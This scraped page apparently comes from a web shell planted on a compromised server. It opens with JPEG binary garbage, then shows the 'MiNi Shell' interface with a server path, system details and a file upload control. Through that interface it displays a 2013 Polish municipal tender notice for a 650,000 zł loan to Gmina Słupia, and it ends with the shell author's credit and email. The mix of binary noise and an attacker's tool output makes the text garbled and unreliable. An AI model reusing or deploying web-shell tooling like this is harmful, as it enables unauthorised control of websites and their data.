JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130710/268750-N-2013.html

<p class="kh_header"><b>Słupia: Udzielenie kredytu długoterminowego w wysokości 650 000,00 zł na spłatę wcześniej zaciągniętych kredytów i pożyczek oraz na pokrycie deficytu budżetu</b><br>
<b>Numer ogłoszenia: 268750 - 2013; data zamieszczenia: 10.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Słupia , Słupia 136, 96-128 Słupia, woj. łódzkie, tel. 046 8315591, faks 046 8315514.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.slupia.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Udzielenie kredytu długoterminowego w wysokości 650 000,00 zł na spłatę wcześniej zaciągniętych kredytów i pożyczek oraz na pokrycie deficytu budżetu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest udzielenie kredytu długoterminowego na spłatę wcześniej zaciągniętych kredytów i pożyczek oraz na pokrycie deficytu budżetu. Wymagania szczegółowe związane z przedmiotem zamówienia:
1)	wysokość kredytu: 650 000,00 PLN (słownie: sześćset pięćdziesiąt tysięcy złotych);
2)	kredyt postawiony będzie do dyspozycji Zamawiającego w dniu podpisania Umowy;
3)	uruchomienie środków nastąpi w dniu podpisania Umowy;
4)	Zamawiający zastrzega sobie możliwość wcześniejszej spłaty kredytu, z tego tytułu 
bank nie będzie pobierał odsetek i innych opłat za spłatę kredytu przed terminem 
5)	karencja w spłacie kapitału: do ostatniego dnia roboczego 2013 roku;
6)	raty kapitałowe spłacane będą w 96 ratach miesięcznych, w ostatnim dniu roboczym 
każdego miesiąca, począwszy od 01 stycznia 2014 roku; przy czym ostatnia rata kredytu będzie ratą wyrównującą;
7)	spłata odsetek następować będzie od dnia uruchomienia kredytu, w ratach 
miesięcznych w ostatnim dniu roboczym każdego miesiąca, do obliczenia kwoty odsetek przyjmuje się rzeczywistą liczbę dni wykorzystania kredytu w stosunku do 365 dni w roku;
8) zabezpieczenie udzielonego kredytu: weksel in blanco wystawiony przez Gminę Słupia wraz z deklaracją wekslową kontrasygnowane przez Skarbnika Gminy oraz oświadczenie o dobrowolnym poddaniu się egzekucji zgodnie z ustawą z dnia 
29 sierpnia 1997 r. - Prawo Bankowe (Dz. U. z 2012 roku poz. 1376 z późn. zm.);
9) oprocentowanie kredytu będzie stanowić sumę stawki WIBOR 1 M z ostatniego dnia miesiąca poprzedzającego rozpoczęcie miesiąca okresu obrachunkowego i stałej 
w trakcie trwania umowy marży banku. Koszty oraz wszelkie opłaty związane z obsługą kredytu Wykonawca jest zobowiązany wliczyć wszelkie opłaty do marży banku w taki sposób, aby skalkulować i przedstawić w ofercie jedną stawkę procentową, której wysokość  jest wiążąca i niezmienna w całym okresie kredytowania (do celów porównania ofert należy przyjąć stawkę WIBOR 1 M z dnia 16.07.2013 roku;
10) Wykonawca jest obowiązany do skalkulowania i podania w ofercie wyłącznie jednej stawki składającej się z:
a)	stopy procentowej WIBOR 1 M
b)	marży banku 
11) przedstawiona w ofercie marża nie może ulec zmianie w trakcie trwania umowy kredytowej.
12) ewentualna prowizja od udzielnego kredytu płatna będzie jednorazowo w dniu wypłaty kredytu;
13) kredyt nie może być obciążony innymi opłatami i prowizjami niż wymienione w SIWZ;
14) Zamawiający zastrzega sobie:
a)	zmianę terminu uruchomienia kredytu bez dodatkowych kosztów;
b)	prawo wcześniejszej spłaty kredytu lub rezygnację z części kredytu bez dodatkowych kosztów;
c)	naliczane odsetki będą tylko od kwoty aktualnego zadłużenia pozostającego do spłaty;
d)	możliwość zmiany harmonogramu spłaty kredytu w przypadku niewykorzystania pełnej kwoty kredytu lub przedterminowej spłaty części kredytu;
15) celem wstępnego zbadania zdolności kredytowej oraz opracowania własnych informacji przez Wykonawcę, Zamawiający dołącza do SIWZ następujące dokumenty finansowe:
a)	sprawozdanie Rb - 27 S z wykonania planu dochodów budżetowych za I kw. 2013 - Załącznik Nr 5 do SIWZ;
b)	sprawozdanie Rb - 28 S z wykonania planu wydatków budżetowych za I kw. 2013 - Załącznik Nr 6 do SIWZ;
c)	sprawozdanie Rb - Z o stanie zobowiązań za I kw. 2013 - Załącznik Nr 7 do SIWZ;
d)	sprawozdanie Rb - NDS o nadwyżce/deficycie za I kw. 2013 - Załącznik Nr 8 do SIWZ;
e)	sprawozdanie Rb - N o stanie należności oraz wybranych aktywów finansowych za I kw. 2013 - Załącznik Nr 9 do SIWZ;
f)	sprawozdanie Rb-NDS o nadwyżce/deficycie za 2012 rok - Załącznik Nr 10 do SIWZ;
g)	sprawozdanie Rb-NDS o nadwyżce/deficycie za 2011 rok - Załącznik Nr 11 do SIWZ;
h)	sprawozdanie Rb-Z o stanie zobowiązań za 2012 rok - Załącznik Nr 12 do SIWZ;
i)	sprawozdanie Rb-Z o stanie zobowiązań za 2011 rok - Załącznik Nr 13 do SIWZ;
j)	sprawozdanie Rb-N o stanie należności oraz wybranych aktywów finansowych za 2012 rok - Załącznik Nr 14 do SIWZ;
k)	sprawozdanie Rb-N o stanie należności oraz wybranych aktywów finansowych za 2011 rok - Załącznik Nr 15 do SIWZ;
l)	sprawozdanie Rb-28S z wykonania planu wydatków budżetowych za 2012 rok - Załącznik Nr 16 do SIWZ;
m)	sprawozdanie Rb-28S z wykonania planu wydatków budżetowych za 2011 rok - Załącznik Nr 17 do SIWZ;
n)	sprawozdanie Rb-27S z wykonania planu dochodów budżetowych za 2012 rok - Załącznik Nr 18 do SIWZ;
o)	sprawozdanie Rb-27S z wykonania planu dochodów budżetowych za 2011 rok - Załącznik Nr 19 do SIWZ;
p)	sprawozdanie z wykonania budżetu Gminy Słupia za 2012 rok - Załącznik Nr 20 do SIWZ;
q)	Uchwała Nr XXV/125/13 RADY GMINY SŁUPIA z dnia 31 stycznia 2013 roku w sprawie uchwalenia budżetu na 2013 rok - Załącznik Nr 21 do SIWZ;
r)	opinia RIO z wykonania budżetu za 2012 rok - Załącznik Nr 22 do SIWZ;
s)	opinia RIO z wykonania budżetu za 2011 rok - Załącznik Nr 23 do SIWZ;
t)	opinia RIO o prawidłowości planowanej kwoty długu Gminy Słupia wynikającej 
z uchwały WPF na lata 2013-2016 - Załącznik Nr 24 do SIWZ;
u)	uchwała dot. wieloletniej prognozy finansowej na lata 2013-2016 - Załącznik 
Nr 25 do SIWZ;
2. Podstawowe informacje o Gminie Słupia:
a)	informacja dot. funkcjonujących kredytów na dzień 31.03.2013 rok - Załącznik Nr 26 do SIWZ;
b)	uchwała dot. wyboru Wójta Gminy - Załącznik Nr 27 do SIWZ;
c)	uchwała dot. wyboru Skarbnika Gminy - Załącznik Nr 28 do SIWZ;
d)	liczba mieszkańców Gminy Słupia na dzień 31.12.2012 rok - 2 701
e)	ogólna stopa bezrobocia w powiecie skierniewickim na dzień 31.12.2012 rok - 9,1%;
f)	infrastruktura społeczna i techniczna - Gmina Słupia ma dobrze rozwiniętą zarówno infrastrukturę społeczną jak i techniczną - utwardzone drogi i niemal 
w 100% zwodociągowanie gospodarstwa. Gmina Słupia posiada własną oczyszczalnię ścieków oraz 5,5 km sieci kanalizacyjnej, w tym 68 przyłączy kanalizacyjnych. Na terenie gminy istnieją 2 Zespoły Szkół Ogólnokształcących, 2 jednostki budżetowe - Gminny Ośrodek Oświaty Kultury i Sportu i Gminny Ośrodek Pomocy Społecznej, klub sportowy LUKS OLIMPIC Słupia; 
5 jednostek Ochotniczych Straży Pożarnych oraz Koła Gospodyń Wiejskich. 
g)	liczba jednostek prowadzących działalność gospodarczą, w tym osoby prawne - 156;
h)	powierzchnia gminy - 41,16 km2..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2021.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dotyczącego posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania Zamawiający uzna, jeżeli Wykonawca wykaże, że:
1) posiada zezwolenie Komisji Nadzoru Finansowego na wykonywanie działalności gospodarczej, w zakresie określonym w przepisach ustawy z dnia 29 sierpnia 1997 r. - Prawo Bankowe (Dz. U. z 2012 roku, poz. 665 z późn. zm.) lub inny równoważny dokument potwierdzający prawo do prowadzenia działalności bankowej, jeżeli Wykonawca nie prowadzi działalności na podstawie zezwolenia wydanego przez Komisję Nadzoru Bankowego.
Ocena spełniania tego warunku zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dotyczącego posiadania wiedzy i doświadczenia Zamawiający uzna: 
1) podpisane oświadczenie o spełnieniu warunków udziału w postępowaniu, o którym mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych.
Ocena spełniania tego warunku zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dotyczącego dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia Zamawiający uzna:
1) podpisane oświadczenie o spełnieniu warunków udziału w postępowaniu, o którym mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych.
Ocena spełniania tego warunku zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dotyczącego dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający uzna:
1) podpisane oświadczenie o spełnieniu warunków udziału w postępowaniu, o którym mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych.
Ocena spełniania tego warunku zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dotyczącego sytuacji ekonomicznej i finansowej Zamawiający uzna:
1) podpisane oświadczenie o spełnieniu warunków udziału w postępowaniu, o którym mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych.
Ocena spełniania tego warunku zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. formularz oferty, 2. oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu, 3. w przypadku, gdy Wykonawcę reprezentuje pełnomocnik - pełnomocnictwo określające jego zakres i podpisane przez osoby uprawnione do reprezentacji Wykonawcy, 4. w przypadku, gdy ofertę składają Wykonawcy ubiegający się wspólnie o udzielenie zamówienia wymagane jest załączenie dokumentu pełnomocnictwa określającego zakres umocowania pełnomocnika ustanowionego do reprezentowania ich w postępowaniu albo rezprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, stosownie do art. 23 ust. 2 ustawy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Umowa zostanie zawarta z uwzględnieniem postanowień wynikających z treści niniejszej SIWZ oraz danych zawartych w ofercie. 
2. Niedopuszczalna jest zmiana istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba, że konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Zamawiającego.
3. Zamawiający zgodnie z art. 144 ust. 1 ustawy przewiduje możliwość dokonywania zmian w treści zawartej umowy w stosunku do treści oferty w zakresie:
1)	gdy zmianie uległy przepisy prawne powszechnie obowiązujące istotne dla realizacji przedmiotu umowy; 
2)	odstąpienia na wniosek zamawiającego od realizacji części zamówienia 
i związanej z tym zmiany wynagrodzenia, pod warunkiem wystąpienia obiektywnych okoliczności, których Zamawiający nie mógł przewidzieć na etapie postępowania, a które powodują, że wykonanie przedmiotu zamówienia bez ograniczenia zakresu zamówienia, powodowałyby dla Zamawiającego niekorzystne skutki z uwagi na zamierzony cel realizacji przedmiotu zamówienia 
i związane z tym racjonalne wydatkowanie środków publicznych;
3) zmiany harmonogramu spłaty kredytu tj. terminu i kwoty spłaty poszczególnych rat;
4) zmiana danych związanych z obsługą administracyjno - organizacyjną Umowy (np.: zmiana Nr rachunku bankowego, zmiana danych teleadresowych Zamawiającego i/lub Wykonawcy).
4. Forma zmian umowy: pod rygorem nieważności wyłącznie w formie pisemnej, 
w postaci aneksu do umowy.
5. W razie istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży 
w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości 
o tych okolicznościach.
6. Zamawiający ustala istotne postanowienia, które zostaną wprowadzone do treści zawieranej umowy:
1) zawarcie umowy na okres od dnia podpisania umowy do dnia 31.12.2021 roku;
2) warunki udzielenia i obsługi kredytu w wysokości 650.000,00 PLN muszą być zgodne z wymaganiami Zamawiającego opisanymi w SIWZ Opis przedmiotu zamówienia oraz zobowiązaniami Wykonawcy zawartymi w złożonej ofercie;
3) Umowa będzie nieważna w części wykraczającej poza przedmiot zamówienia określony w SIWZ.
7. Zamawiający wymaga, aby Wykonawca, którego oferta zostanie uznana jako najkorzystniejsza w niniejszym postępowaniu, złożył parafowany projekt umowy na wykonanie przedmiotowego zamówienia opracowany zgodnie z ustawą z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz.759 z późn. zm.), ustawą z dnia 29 sierpnia 1997 roku - Prawo bankowe (Dz. U. z 2002 r. Nr 72 poz. 665 z późn. zm.), ustawą z dnia 23 kwietnia 1964 roku - Kodeks cywilny (Dz. U. 1964 Nr 16 poz. 93 z późn. zm.) oraz postanowieniami niniejszej SIWZ i treścią złożonej przez Wykonawcę oferty przetargowej.
8. Zamawiający nie będzie związany z przedstawionym przez Wykonawcę projektem umowy i zastrzega sobie możliwość wprowadzenia zmian do tego projektu przed podpisaniem umowy.
9. Wykonawca zobowiązany będzie do uwzględnienia istotnych postanowień 
w projekcie umowy na udzielenie i obsługę kredytu, który zostanie przedłożony Zamawiającemu przed podpisaniem umowy ostatecznej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.slupia.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Słupi
Słupia 136
96-128 Słupia
pokój Nr 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.07.2013 godzina 09:00, miejsce: Urząd Gminy w Słupi
Słupia 136
96-128 Słupia
pokój Nr 1 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com